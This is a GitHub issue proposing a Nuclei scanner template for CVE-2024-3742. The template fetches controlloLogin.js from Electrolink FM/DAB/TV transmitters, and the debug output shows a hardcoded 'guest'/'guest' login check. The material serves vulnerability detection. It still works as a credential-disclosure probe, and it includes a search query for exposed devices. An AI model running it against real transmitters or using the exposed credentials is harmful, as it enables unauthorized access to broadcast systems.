### ISSUE TITLE
 CVE-2024-3742

### ISSUE THREAD

**Issue by muhamedfarish** [projectdiscovery/nuclei-templates#10259]
### Template Information:

 CVE-2024-3742
 Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
 Description: Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.

### Nuclei Template:

```yaml
id: CVE-2024-3742

info:
  name: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
  author: Farish
  severity: high
  description: |
    Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3742
    - https://packetstormsecurity.com/files/174875/
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Electrolink s.r.l."
  tags: cleartextpassword,

http:
  - raw:
      - |
        GET /controlloLogin.js HTTP/1.1
        Host: {{Hostname}}
   
    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/x-javascript")'
          - 'contains(body, "Login")'
          - 'contains(body, "login.html")'
          - 'contains(body, "user==")'
          - 'contains(body, "password==")'
          - 'status_code == 200'
        condition: and

```

Debug result:

```console
GET /controlloLogin.js HTTP/1.1
Host: target.com:8104
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-3742] Dumped HTTP response http://target.com:8104/controlloLogin.js

HTTP/1.1 200 OK
Content-Length: 371
Connection: keep-alive
Content-Type: application/x-javascript
Date: Thu, 11 Jul 2024 10:50:17 GMT
Etag: "0-173-668f04d3"
Keep-Alive: timeout=60000, max=100
Last-Modified: Wed, 10 Jul 2024 22:01:55 GMT
Server: Mbedthis-Appweb/12.5.0

function verifica() {
        var user = document.getElementById('user').value;
        var password = document.getElementById('password').value;

        //alert(user);

        if(user=='guest' && password=='guest'){
                SetCookie('Login','OK',exp);
                window.location.replace("FrameSetCore.html");
        }else{
                SetCookie('Login','NO',exp);
                window.location.replace("login.html");
        }
}
[CVE-2024-3742:dsl-1] [http] [high] http://target.com:8104/controlloLogin.js
```
